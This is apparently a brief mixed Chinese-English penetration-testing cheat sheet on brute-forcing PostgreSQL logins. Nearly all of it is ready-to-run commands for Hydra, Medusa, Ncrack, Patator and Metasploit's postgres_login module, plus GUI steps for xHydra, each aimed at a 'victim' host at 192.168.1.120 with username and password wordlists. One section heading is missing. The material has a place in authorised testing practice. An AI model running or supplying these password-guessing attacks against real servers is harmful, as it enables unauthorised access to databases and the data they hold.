0x01 Hydra
hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120 postgres
-L: denotes path for username list
-P: denotes path for password list
0x02 xHydra
kali中打开xHydra。并选择单个目标选项,并给出您的受害者PC的IP。然后在“ 协议”选项框中选
择postgres,并将端口号5432与端口选项相关联。
转到密码标签并选择用户名列表,并在与其相邻的框中输入包含用户名的文本文件的路径。
然后选择密码列表并在与其相邻的框中输入包含所有密码的文本文件的路径。
完成后,转到开始选项卡,然后单击左侧的开始按钮。
现在,字典攻击的过程将开始。
0x03 Medusa
Medusa -h 192.168.1.120 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
Here
-U: denotes path for username list
-P: denotes path for password list
0x04 Ncrack
ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.120:5432
Here
-U: denotes path for username list
-P: denotes path for password list
patator pgsql_login host=192.168.1.120 user=FILE0 0=/root/Desktop/user.txt
password=FILE1 1=/root/Desktop/pass.txt
0x06 Metasploit
打开Kali Linux 运行msf
use auxiliary/scanner/postgres/postgres_login
msf exploit (scanner/postgres/postgres_login)>set rhosts 192.168.1.120 (IP of Remote Host)
msf exploit (scanner/postgres/postgres_login)>set user_file /root/Desktop/user.txt
msf exploit (scanner/postgres/postgres_login)>set userpass_file /root/Desktop/pass.txt
msf exploit (scanner/postgres/postgres_login)>set stop_on_success true
msf exploit (scanner/postgres/postgres_login)> exploit